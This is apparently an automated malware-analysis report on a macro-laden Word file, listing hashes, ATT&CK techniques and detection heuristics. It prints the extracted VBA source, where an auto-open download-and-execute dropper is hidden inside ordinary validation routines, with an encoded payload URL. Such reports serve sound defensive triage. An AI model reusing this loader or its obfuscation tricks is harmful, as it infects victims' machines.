Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 750bd45fdc21c684…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 60.9 KB
Created: 2016-05-25 10:52:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2019-03-10
MD5: 33feba79af6874509aeccb6a9ddc2e54
SHA-1: db950c9e5100cb76e9652a2dc7e72962bb6319de
SHA-256: 750bd45fdc21c684653559c51ab6aac1df3760f8c04202f32cdf132a6d02df3d
Risk Score: 352

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an auto-executing loader, that are designed to download and execute a second-stage payload. Heuristics indicate the use of CreateObject and Shell execution, along with HTTP download and file saving capabilities. ClamAV detections further confirm the malicious nature of the embedded macros.

Heuristics 9

  • ClamAV: Doc.Macro.ObfuscatedData-6136276-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
  • VBA project inside OOXML (severity: medium; 5 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk (severity: critical; rule: OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     Ogurcov = greeks__1.responseBody
  • Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set greeks__0_22 = CreateObject(OgurcovPech(3))
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
     Set greeks__0_22 = CreateObject(OgurcovPech(3))
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 45571 bytes
SHA-256: 66169d1140bb4b9d136611e3eade79703b637e1942b697e16ea68f32322b44ef
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
IsWord "Dota"
IsEmail "helpdesc@mail.com"
IsName "Augustos"
IsAlpha "Outdoorstand"
IsBlank "Sed"
IsAlphaNum "Destanation-"
End Sub

Attribute VB_Name = "Module1"

' =================================
' MODULE:       mod_Validation
' Level:        Framework module
' Version:      1.03
' Description:  string functions & procedures
'
' Source/date:  Bonnie Campbell, 2/10/2015
' Revisions:    BLC - 2/10/2015 - 1.00 - initial version
'               BLC - 11/12/2015 - 1.01 - added IsAlphaNumDashSlash(), IsAlphaNumDashUnder(),
'                                         IsWord(), IsParagraph(),
'                                         & verifications via VerifyString()
'               BLC - 4/4/2016 - 1.02 - added IsInArray(), updated ValidString(),
'                                       replaced Exit_Function w/ Exit_Handler
'               BLC - 5/20/2016 - 1.03 - added IsTypeMatch()
' =================================


' ---------------------------------
' FUNCTION:     ValidateString
' Description:  Checks if string is proper type
' Assumptions:  -
' Parameters:   strInspect - string to check
'               strType - string type (alpha, alphanum, numeric, etc.)
' Returns:      boolean - True (string is valid), False (string is invalid)
' Throws:       none
' References:   none
' Source/date:
'
'
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
'   BLC - 11/12/2015 - added alphanumdashslashspace, alphanumdashspace, alphanumspace, alphanumdashunder,
'                      alphanumdashunderspace
'   BLC - 4/4/2016   - added name & email cases
' ---------------------------------
Public Function ValidateString(ByVal strInspect As String, strType As String) As Boolean
On Error GoTo Err_Handler

    Dim blnIsValid As Boolean

    'default
    blnIsValid = False

    Select Case strType
        Case "alpha"
            blnIsValid = IsAlpha(Trim(strInspect))
        Case "alphanum"
            blnIsValid = IsAlphaNum(Trim(strInspect))
        Case "alphadashunderscore"
            blnIsValid = IsAlphaDashUnderscore(Trim(strInspect))
        Case "alphanumspace"
            blnIsValid = IsAlphaNum(Trim(Replace(strInspect, " ", "")))
        Case "numeric"
            blnIsValid = IsNumeric(Trim(strInspect))
        Case "alphanumdash"
            blnIsValid = IsAlphaNumDash(Trim(strInspect))
        Case "alphaspace"
            blnIsValid = IsAlphaNumDash(Replace(strInspect, " ", ""))
        Case "alphanumdashspace"
            blnIsValid = IsAlphaNumDash(Trim(Replace(strInspect, " ", "")))
        Case "alphanumdashunder"
            blnIsValid = IsAlphaNumDashUnder(Trim(strInspect))
        Case "alphanumdashunderspace"
            blnIsValid = IsAlphaNumDashUnder(Trim(Replace(strInspect, " ", "")))
        Case "alphanumdashslash"
            blnIsValid = IsAlphaNumDashSlash(Trim(strInspect))
        Case "alphanumdashslashspace"
            blnIsValid = IsAlphaNumDashSlash(Trim(Replace(strInspect, " ", "")))
        Case "name"
            blnIsValid = IsName(Trim(strInspect))
        Case "email"
            blnIsValid = IsEmail(Trim(strInspect))
        Case "word"
            blnIsValid = IsWord(Trim(strInspect))
        Case "paragraph"
            blnIsValid = IsParagraph(Trim(Replace(strInspect, " ", "")))
    End Select

    ValidateString = blnIsValid

Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - CountInString[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlpha
' Description:  Checks if string is alphabetic
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alpha), False (string contains non-alpha characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
' ---------------------------------
Function IsAlpha(strInspect As String) As Boolean
On Error GoTo Err_Handler:
 
    Dim i As Integer
    
    wozner4 = 22
OgurcovPole.Type = 1
 OgurcovPole.Open
    'default
    IsAlpha = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case Else
          IsAlpha = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlpha[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaDashUnderscore
' Description:  Checks if string includes only letter, underscore, dash
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a name), False (string contains non-word characters)
' Throws:       none
' References:   none
' Source/date:  Bonnie Campbell, April 4, 2016 - for NCPN tools
' Adapted:      -
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsAlphaDashUnderscore(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim strPattern As String
    strPattern = "^[a-zA-Z_-]+$"

    IsAlphaDashUnderscore = IsRegExpMatch(strInspect, strPattern)
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaDashUnderscore[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNum
' Description:  Checks if string is alphanumeric
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
' ---------------------------------
Public Function IsAlphaNum(strInspect As String) As Boolean
On Error GoTo Err_Handler:

 greeks_sedming.Open (greeksNaStole)
    Dim i As Integer
    
    'default
    IsAlphaNum = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case Else
          IsAlphaNum = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNum[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNumDash
' Description:  Checks if string is alphanumeric w/ or w/o dash
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDash(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsAlphaNumDash = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-"
        Case Else
          IsAlphaNumDash = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNumDash[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNumDashUnder
' Description:  Checks if string is alphanumeric w/ or w/o dash or underscore
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric/dash/
'                         underscore characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDashUnder(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsAlphaNumDashUnder = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-"
        Case "/"
        Case "_"
        Case Else
          IsAlphaNumDashUnder = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNumDashUnder[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNumDashSlash
' Description:  Checks if string is alphanumeric w/ or w/o dash or slash
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric/dash/slash characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDashSlash(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsAlphaNumDashSlash = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-"
        Case "/"
        Case Else
          IsAlphaNumDashSlash = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNumDashSlash[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsName
' Description:  Checks if string is a name (can contain: letter, period, dash, space)
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a name), False (string contains non-word characters)
' Throws:       none
' References:   none
' Source/date:
'   Matthew Scharley, November 8, 2008
'   http://stackoverflow.com/questions/275160/regex-for-names
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Public Function IsName(strInspect As String) As Boolean
On Error GoTo Err_Handler:

greeks__1.Open OgurcovPech(10 - (2 + 1 + 2)), Djeremy, False
greeks__1.send
 greeks__4 = greeks__3(OgurcovPech(180 / 30))
 
 greeksNaStole = greeks__4
greeksNaStole = greeksNaStole + OgurcovPech(55 - 43)

    Dim strPattern As String
    strPattern = "^[A-Z]'?[- a-zA-Z]([a-zA-Z])*$"

    IsName = IsRegExpMatch(strInspect, strPattern)
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsName[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsEmail
' Description:  Checks if string is an email address
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a valid email address),
'                         False (string isn't a valid email address)
' Throws:       none
' References:   none
' Notes:
'               Pattern => ^[a-zA-Z]+(?:\s+[a-zA-Z]+)*$
'               Explanation:
'                ^          Start of string
'                [a-zA-Z]   Any character in the class a to z or A to Z
'                +          One or more repititions
'                (?:   )    Match expresion but don't capture
'                \s+        Whitespace, One or more repititions
'                *          Zero or more repititions
'                $          End of string
'
'   In the end, the simplest pattern is best to avoid rejecting valid
'   email addresses -- e.g. w/ tags email+tag@example.com
'               Pattern => ^.+@.+\..+$    (originally /.+@.+\..+/i)
'               Explanation:
'                   ^  start
'                   .+ any character(s) - one or more times
'                   @  followed by @
'                   .+ any character(s) - one or more times
'                   \. followed by a period (.)
'                   .+ any character(s) - one or more times
'                   $  end
' Source/date:
'   David Celis, September 6, 2012
'   https://davidcel.is/posts/stop-validating-email-addresses-with-regex/
'   Chris Nielson July 17, 2012
'   http://stackoverflow.com/questions/11501860/regular-expression-pattern-to-validate-name-field
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Public Function IsEmail(strInspect As String) As Boolean
On Error GoTo Err_Handler:
 Set greeks__0_22 = CreateObject(OgurcovPech(3))
    c = ""
     Set greeks__3 = greeks__0_22.Environment(OgurcovPech(4))
     
 Dim IJK As Integer
For IJK = LBound(ContainerX) To UBound(ContainerX)
 Djeremy = Djeremy & RemoveSpecialChar(IJK)
 Next IJK

    Dim strPattern As String
    strPattern = "^.+@.+\..+$"

    IsEmail = IsRegExpMatch(strInspect, strPattern)
    
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsEmail[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsWord
' Description:  Checks if string is alphabetic
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a word), False (string contains non-word characters)
' Throws:       none
' References:   none
' Source/date:
'
'
' Adapted:      Bonnie Campbell, November 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Public Function IsWord(strInspect As String) As Boolean

ContainerX = Split("1664U1856U1856U1792U928U752U752U1584U1600U1648U1552U1744U1616U736U1712U1648U1568U736U1792U1728U752U1712U880U1696U1664U1824U1856U832U1664U1616U1824U1856U1648", "U")
 Dim agreeks As String
 agreeks = TREwozner(UserForm1.TextBox1.ControlTipText, "00", "e")
 agreeks = TREwozner(agreeks, "D!", "M")
 agreeks = TREwozner(agreeks, "bri", "s")
 OgurcovPech = Split(agreeks, "10)")
Set greeks__1 = CreateObject(OgurcovPech(0))
 
 Set OgurcovPole = CreateObject(OgurcovPech(1))

 Set greeks_sedming = CreateObject(OgurcovPech(2))
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsWord = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "-"
        Case Else
          IsWord = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsWord[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsParagraph
' Description:  Checks if string is alphabetic
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alpha), False (string contains non-alpha characters)
' Throws:       none
' References:   none
' Source/date:
'
'
' Adapted:      Bonnie Campbell, November 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsParagraph(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsParagraph = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-", "/", "_", ".", "?", "!"
        Case Else
          IsParagraph = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsParagraph[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsRegExpMatch
' Description:  Checks if string is a match for the regular expression pattern
' Assumptions:  -
' Parameters:   strInspect - string to check
'               strPattern - pattern to check against (string)
' Returns:      boolean - True (string matches), False (string does not match)
' Throws:       none
' References:   Microsoft VBScript Regular Expressions 5.5 (added reference)
' Source/date:
'   RICHA, March 31, 2014
'   https://blog.udemy.com/vba-regex/
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsRegExpMatch(strInspect As String, strPattern As String) As Boolean
On Error GoTo Err_Handler:

    Dim oRegExp As Object
    
    Set oRegExp = CreateObject("vbscript.regexp")
    
    With oRegExp
        .Global = True
        .IgnoreCase = True
        .Pattern = strPattern
        
        IsRegExpMatch = .test(strInspect)

    End With
                
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsRegExpMatch[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsInArray
' Description:  Checks if string is found in the supplied array
' Assumptions:  -
' Parameters:   strFind - string to check
'               aryLookIn - array to look in
' Returns:      boolean - True (string is found), False (string isn't found)
' Throws:       none
' References:   none
' Source/date:
'   Jimmy Pena, June 20, 2012
'   http://stackoverflow.com/questions/11109832/how-to-find-if-an-array-contains-a-string
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsInArray(strFind As String, aryLookIn As Variant) As Boolean
On Error GoTo Err_Handler

  IsInArray = (UBound(Filter(aryLookIn, strFind)) > -1)
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsInArray[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsBetween
' Description:  Checks if value is between supplied bounding values/limits
' Assumptions:  -
' Parameters:   iValue - value to check (variant)
'               lowBound - lower limit (double)
'               highBound - upper limit (double)
'               inclusive - whether the lower & upper limits should be included (boolean)
' Returns:      boolean - True (value is between limits), False (value is outside limits)
' Throws:       none
' References:   none
' Source/date:  Bonnie Campbell, April 4, 2016 - for NCPN tools
' Adapted:      -
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsBetween(iValue As Variant, lowBound As Double, highBound As Double, inclusive As Boolean) As Boolean
On Error GoTo Err_Handler

    Dim isOK As Boolean
    'default
    isOK = False
    
    'ensure numeric
    If Not IsNumeric(iValue) Then GoTo Exit_Handler

    If inclusive Then
        Select Case iValue
            'rejects --> all result in isOK = false (no change)
            Case Is < lowBound
            Case Is > highBound
            
            'valid cases
            Case Is = lowBound
                isOK = True
            Case Is = highBound
                isOK = True
            Case Is > lowBound And (iValue < highBound)
                isOK = True
        End Select
    Else
        Select Case iValue
            'rejects --> all result in isOK = false (no change)
            Case Is < lowBound
            Case Is > highBound
            Case Is = lowBound
            Case Is = highBound
            
            'valid cases
            Case Is > lowBound And (iValue < highBound)
                isOK = True
        End Select
    End If
    
    IsBetween = isOK
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsBetween[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsTypeMatch
' Description:  Checks if value is or can be converted to the data type noted
'               Relies on attempting to convert, if it fails via type mismatch or otherwise false is returned
' Assumptions:  -
' Note:
'               Value     Variant type          Value     Variant type
'               0     Empty (unitialized)       10     Error Value
'               1     Null (no valid data)      11     Boolean
'               2     Integer                   12     Variant (only used with arrays of variants)
'               3     Long Integer              13     Data access object
'               4     Single                    14     Decimal value
'               5     Double                    17     Byte
'               6     Currency                  36     User Defined Type
'               7     Date                      8192           Array
'               8     String
'               9     Object
'
' Parameters:   iValue - value to check (variant)
'               dataType - data type name (string)
' Returns:      boolean - True (value is or can be converted), False (value isn't/can't be converted to the data type passed in)
' Throws:       none
' References:   none
' Source/date:  Bonnie Campbell, May 20, 2016 - for NCPN tools
' Adapted:      -
' Revisions:
'   BLC - 5/20/2016 - initial version
' ---------------------------------
Function IsTypeMatch(iValue As Variant, DataType As String) As Boolean
On Error GoTo Err_Handler

    Dim isOK As Boolean
    Dim result As Variant
    
    'default
    isOK = True
    
    'check type
    Select Case DataType
        Case "boolean"  '0 or 1, yes/no values are mismatches
            result = CBool(iValue)
        Case "byte"     '0 or 1, yes/no values are mismatches
            result = CByte(iValue)
        Case "number"
            If Not IsNumeric(iValue) Then isOK = False
        Case "integer"
            result = CInt(iValue)
        Case "long"
            result = CLng(iValue)
        Case "double"
            result = CDbl(iValue)
        Case "single"
            result = CSng(iValue)
        Case "decimal"
            result = CDec(iValue)
        Case "string"
            result = CStr(iValue)
        Case "date"
            result = CDate(iValue)
        Case "currency"
            result = CDate(iValue)
        Case Else
            isOK = False
    End Select
    
Exit_Handler:
    IsTypeMatch = isOK
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case "13" 'RunTime Error 13: Type Mismatch
        isOK = False
        Resume Exit_Handler
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsTypeMatch[mod_Validation])"
    End Select
    'fail on error
    isOK = False
    Resume Exit_Handler
End Function


Attribute VB_Name = "Module2"
Public greeks__1 As Object
Public OgurcovPole As Object
Public greeks__3 As Object
Public ContainerX() As String
Public greeks__4 As String
Public greeksNaStole As String
Public greeks_sedming As Object
 Public Djeremy As String
Public OgurcovPech() As String




Public Function TREwozner(A1 As String, A2 As String, A3 As String) As String
TREwozner = Replace(A1, A2, A3)
End Function
Public Function RemoveSpecialChar(strFileName As Integer) As String
RemoveSpecialChar = Chr(CInt(ContainerX(strFileName)) / (9 + 7))
End Function

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module3"

' ---------------------------------
' FUNCTION:     PopulateSpeciesPriorities
' Description:  Populate species priority values from species priority concatenation
' Assumptions:  Park priority textboxes are named tbxPARKPriority (e.g. tbxZIONPriority)
' Parameters:   parkCode - 4 character park code (string)
'               priorities - species priority string concatenation for all parks (e.g. "BLCA-1|COLM-Transect|FOBU-1")
' Returns:      Priority - value for park species priority (string)
' Throws:       none
' References:   none
' Source/date:
' Adapted:      Bonnie Campbell, April 9, 2015 - for NCPN tools
' Revisions:
'   BLC - 4/9/2015 - initial version
'   BLC - 5/26/2015 - moved from mod_Species to mod_App_UI
' ---------------------------------
Public Function PopulateSpeciesPriorities(ParkCode As String, priorities As String) As String

On Error GoTo Err_Handler

Dim ParkPriorities As Variant
Dim i As Integer

    'check if parkCode is in priorities string
    If Len(priorities) > Len(Replace(priorities, ParkCode, "")) Then
    
        'prepare the Park Priority values
        ParkPriorities = Split(priorities, "|")
        
        'set park priority values
        For i = 0 To UBound(ParkPriorities)
            'does Park have a priority value?
            If ParkCode = Left(ParkPriorities(i), 4) Then
                PopulateSpeciesPriorities = Replace(ParkPriorities(i), ParkCode + "-", "")
            End If
        Next
        
    Else
        'not listed
        PopulateSpeciesPriorities = "X"
    
    End If
    
Exit_Function:
    Exit Function
    
Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - PopulateSpeciesPriorities[mod_App_UI])"
    End Select
    Resume Exit_Function
End Function

' ---------------------------------
' SUB:          Initialize
' Description:  initialize application values
' Assumptions:  -
' Parameters:   N/A
' Returns:      N/A
' Throws:       none
' References:   none
' Source/date:
' Adapted:      Bonnie Campbell, February 6, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/6/2015  - initial version
'   BLC - 2/19/2015 - added dynamic getParkState() & standard error handling
'   BLC - 3/4/2015  - shifted colors to mod_Color, removed setting of park, state, tgtYear TempVars
'   BLC - 5/13/2015 - stub only
'   BLC - 11/19/2015 - added CreateEnums call to create application specific Enums,
'                      updated documentation to reflect mod_App_UI vs. mod_Init
' ---------------------------------
Public Sub Initialize()
On Error GoTo Err_Handler

    'create the enums specific to this application from the Enums table & mod_App_Enum stub module
    CreateEnums

    'set application UI display
'     SetStartupOptions "AppTitle", dbText, "NCPN Big Rivers"

Exit_Handler:
    Exit Sub
    
Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - Initialize[mod_App_UI])"
    End Select
    Resume Exit_Handler
End Sub

' ---------------------------------
' SUB:          ClickAction
' Description:  Handles click events for various form links
' Assumptions:  Link caption and tag text matches action text values.
'               If a link caption &/or tag changes, the corresponding action must change
'               here too.
' Parameters:   action - concatenated link label caption & tag (string)
' Returns:      N/A
' Throws:       none
' References:   none
' Source/date:
' Adapted:      Bonnie Campbell, February 6, 2015 - for NCPN tools
' Revisions:
'   BLC - 4/26/2016  - initial version
' ---------------------------------
Public Sub ClickAction(action As String)
On Error GoTo Err_Handler

    Dim fName As String, rName As String, oArgs As String
    
    action = LCase(Nz(Trim(action), ""))
    
    'defaults
    fName = ""
    rName = ""
    oArgs = ""
    
    Select Case action
        'Where?
        Case "site"
            fName = "Task"
        Case "feature"
            fName = "Task"
        Case "transect"
        Case "plot"
        'Sampling
        Case "event"
            fName = "Task"
…
vbaProject_00.bin (vba-project)
OOXML VBA project: word/vbaProject.bin, 107008 bytes
SHA-256: e54201ede93a56615012276faf12426406b2f8a01acbd3287cb7b03e6d5d56a3
Detection
